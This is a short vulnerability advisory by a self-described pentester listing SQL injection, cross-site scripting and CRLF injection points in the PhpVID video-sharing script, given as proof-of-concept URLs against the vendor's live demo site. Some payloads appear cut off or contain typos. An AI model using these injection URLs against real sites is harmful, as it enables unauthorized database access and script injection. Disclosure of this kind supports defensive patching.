################################################################################## _____ _ _ _ _____ | __ \ | | | | (_) / ____| | |__) |_____ _____ | |_ _| |_ _ ___ _ __ | (___ ___ ___ | _ // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \ \___ \ / _ \/ __| | | \ \ __/\ V / (_) | | |_| | |_| | (_) | | | | ____) | __/ (__ |_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| |_____/ \___|\___| ################################################################################## PhpVID Script, Multiple Vulnerabilities Product Page: http://www.vastal.com/phpvid-the-video-sharing-software.html Script Demo: http://www.phpvid.com Author(Pentester): 3spi0n On Web: RevolutionSec.Com - GraySecure.Org On Social: Twitter.Com/eyyamgudeer ################################################################################## [1] SQL Injection Vulnerabilities on Demo Site [+] (browse_videos.php, n Param) >>> http://www.phpvid.com//browse_videos.php?cat=&n='1 [+] (groups.php, cat Param) >>> http://www.phpvid.com/groups.php?cat='1 [+] (members.php, n Param) >>> http://www.phpvid.com/members.php?browse=recent&n='1 [2] XSS Vulnerability on Demo Site [+] (browse_videos.php, n Param) >>> http://phpvid.com/browse_videos.php?cat=&n=1' [+] (groups.php, cat Param) >>> http://phpvid.com//groups.php?cat=1' [+] (search_results.php.php, query Param) >>> http://phpvid.com//search_results.php?query= [3] CRLF Injection Vulnerability on Demo Site >>> http://phpvid.com/search_results.php?query=

come to dance!
by, 3spi0n